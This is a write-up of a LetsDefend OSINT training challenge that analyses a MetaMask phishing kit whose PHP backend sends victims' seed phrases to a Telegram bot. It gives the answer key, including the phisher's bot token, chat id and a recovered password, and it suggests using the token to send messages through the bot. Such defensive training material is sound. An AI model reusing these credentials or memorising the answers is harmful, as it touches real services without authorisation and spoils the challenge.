LetsDefend - Challenge - The Phisher - OSINT

Hello everyone, this is the first challenge on the topic of OSINT in LetsDefend and also the first challenge made by me. Hope you guys like it, if you have any suggestions, please comment below in the comments section ^^

Question 1: This question has no answer, if you want to solve the questions behind, you need to open the file of the phisher. We will access the file OSINT_this.txt , we will easily see that there is a Github profile, we will go to see if there is anything or not.

Looking at this pile, I think the most suspicious is CTF_is_UwU. When you enter, you will see nothing, right, me too. But don't give up because of that, there have been many cases of organizations editing files on github but not deleting the history, leading to the disclosure of some important information, and now we will see if this file has been corrupted. edit or not and edit what. After a while of searching, I found this file that revealed a password

And now the question is: what is the password for? Is this the password of the phishing file? The answer is not because I can't open phishing file with this password, but I found bachkhoaman.pdf has been encrypted and if you want to read, you have to open this file. A advise of so many people is: "Never set one password for multiple files", so I try to decrypt this file with the password and BOOM, I have opened it!:

But I just see this paragraph, I try to read and I have found a interesting things: 

It's a base64 code. When I decode this I have a other password, now I can be sure that this is the password of phishing file, decrypt this phishing file and finally I can extract all the files in

Question 2: 

After reading the question, you probably know what the question means, right? So where can I find it now? They give us a compressed file with a lot of different folders inside, and my first habit is always to look through all the folders of files and folders in it. Looking at it for a while, we can see that there is a metamask folder - very suspicious!! If in doubt, go there :3

We will see in this directory there are index.html, .DS_Store, metamask.php, from which we can conclude that: the machine this person uses is a Macbook, the index file with the metamask can be two files that make up a website. . For those of you who don't know, PHP is one of the most popular programming languages by developers in web development, especially in the Backend design - the part that handles user input.

Looking at the code above, we will immediately see that there are many suspicious things (wait for me to analyze more closely) and we have also answered the first question.

Answer: Metamask

Question 3: 

Answer: metamask.php

Now let's analyze this code together:

• Line 3-7: the code uses sypex geo's api to get information related to geography: country; city, day-month-year (default information available on the computer)
• Line 21-26: interface to receive output after the server has finished processing
• Line 29-end: function sendTel with parameter $message

So that's it, we'll again notice there's a very long blue note line. First we know for sure the web will return Phrase (user input), IP, User. These are all private things and the fact that this website returns the above output is definitely an unusual web. In addition, the note line also has a seductive nuance => This is definitely the backend of a phishing web

Answer: metamask.php

Question 4: 

Answer: PHP

Question 5: 

Answer: Sypex Geo

On this one here, we have to see the first lines (from 3 to 7). We can see they have a api, when we search Google, we will know Sypex Geo api is used to retrieve the victim's machine information.

Question 6:

Remember that we haven't thoroughly analyzed the code, now is the time:

This is the function that handles sending messages in the phishing file. We can see there is an id, a token, but we don't know whose id and token it is. So we have to read the code again to understand deeply how the code works. After I sit for a while analyzing and deducing, I can briefly say how it works as follows: suppose the phisher sends a phishing link, when the victim clicks it will be redirected to the phisher's chat room, then to the phisher's api Telegram, the phisher can create a bot with a token with the task of transferring the phisher's message to the victim thanks to parameters such as chat_id, text. And when the victim messages with the bot, all the victim's messages will be saved to log/log.txt. Then we can immediately guess that this is the phisher's own id and token. Now we just need to access this link => the answer we need to find

Answer: 3

Question 7:

Because when target type the input, program will append in end of file, the newest content is always the most recent phishing incident

Answer: father....

Question 8:

It is easy to see that the sendTel function contains id and token which are important for user authentication on any page, and we see it using Telegram then yeah, self-understanding

Answer: Telegram

Question 9:

Answer: 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10 (You can find it in the source code)

Question 10:

Answer: 5442785564

Question 11:

Answer: j1j1b1s@m3r0 (look in the source code)

Question 12:

As I analyzed in part 6, the id and token we know are phisher's, and we can completely do the same as phisher, create any text, when sent, phisher's information will be reveal:

Answer: Marcus Aurelius

Question 13:

Answer: pumpkinboii

This is one of the challenges in CyberDefenders that I changed to make challenge so harder. Hope you like it.

Link challenge of CyberDefenders: https://cyberdefenders.org/blueteam-ctf-challenges/95